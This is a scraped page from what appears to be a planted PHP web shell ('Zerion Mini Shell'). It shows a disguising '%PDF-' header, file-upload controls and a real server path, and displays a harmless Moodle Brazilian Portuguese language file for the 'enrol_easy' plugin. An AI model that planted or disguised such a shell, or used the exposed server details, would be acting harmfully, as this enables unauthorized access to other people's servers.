%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home2/vacivi36/moodledata/lang/pt_br/
Upload File :
Create Path :
Current File : //home2/vacivi36/moodledata/lang/pt_br/enrol_easy.php

<?php
// This file is part of Moodle - https://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <https://www.gnu.org/licenses/>.

/**
 * Strings for component 'enrol_easy', language 'pt_br', version '3.9'.
 *
 * @package     enrol_easy
 * @category    string
 * @copyright   1999 Martin Dougiamas and contributors
 * @license     https://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

defined('MOODLE_INTERNAL') || die();

$string['easy:config'] = 'Configurar instâncias de Inscrição Simplificada';
$string['easy:delete'] = 'Excluir instâncias de Inscrição Simplificada';
$string['easy:manage'] = 'Gerenciar instâncias de Inscrição Simplificada';
$string['easy:unenrol'] = 'Cancelar a inscrição nas instâncias de Inscrição Simplicada';
$string['easy:unenrolself'] = 'Cancelar a inscrição no curso';
$string['enrolenddate'] = 'Fim da inscrição';
$string['enrolenddate_help'] = 'Estudantes não poderão se inscrever depois dessa data.';
$string['enrolform_course_code'] = 'Código de Inscrição';
$string['enrolform_heading'] = 'Inscrever em um curso';
$string['enrolform_pagetitle'] = 'Inscrever em um curso';
$string['enrolform_submit'] = 'Inscrever';
$string['enrolstartdate'] = 'Começo da inscrição';
$string['enrolstartdate_help'] = 'Estudantes não poderão se inscrever antes dessa data.';
$string['error_disabled_global'] = 'A inscrição simplificada está desativada para esse curso.';
$string['error_enrolenddate'] = 'A inscrição para esse curso acabou.';
$string['error_enrolstartdate'] = 'A inscrição para esse curso ainda não começou.';
$string['error_invalid_code'] = 'Código de inscrição inválido.';
$string['header_coursecodes'] = 'Códigos de inscrição.';
$string['pluginname'] = 'Inscrição Simplificada';
$string['pluginname_desc'] = 'Permitir inscrição simplificada por código de texto.';
$string['qrenabled'] = 'Habilitar inscrição por QR Codes';
$string['qrenableddesc'] = 'Habilitar inscrição por QR Codes';
$string['regenerate_codes'] = 'Gerar código novamente';
$string['regenerate_codes_help'] = 'Marque aqui e clique em "Salvar mudanças" para recriar todos os códigos de inscrição acima.';
$string['showqronmobile'] = 'Habilitar Leitor de QR Code no mobile';
$string['showqronmobiledesc'] = 'Habilitar inscrição por QR Codes em dispositivos móveis. Pode não funcionar em todos os navegadores. Preferencialmente use QR Codes no Chrome e em um desktop, laptop ou chromebook.';
$string['status'] = 'Habilitado';
$string['status_help'] = 'Marque "Sim" para habilitar inscrição. Marque "Não" para desabilitar inscrição.';
$string['unenrolselfconfirm'] = 'Deseja realmente se desinscrever do curso "{$a}"?';

Zerion Mini Shell 1.0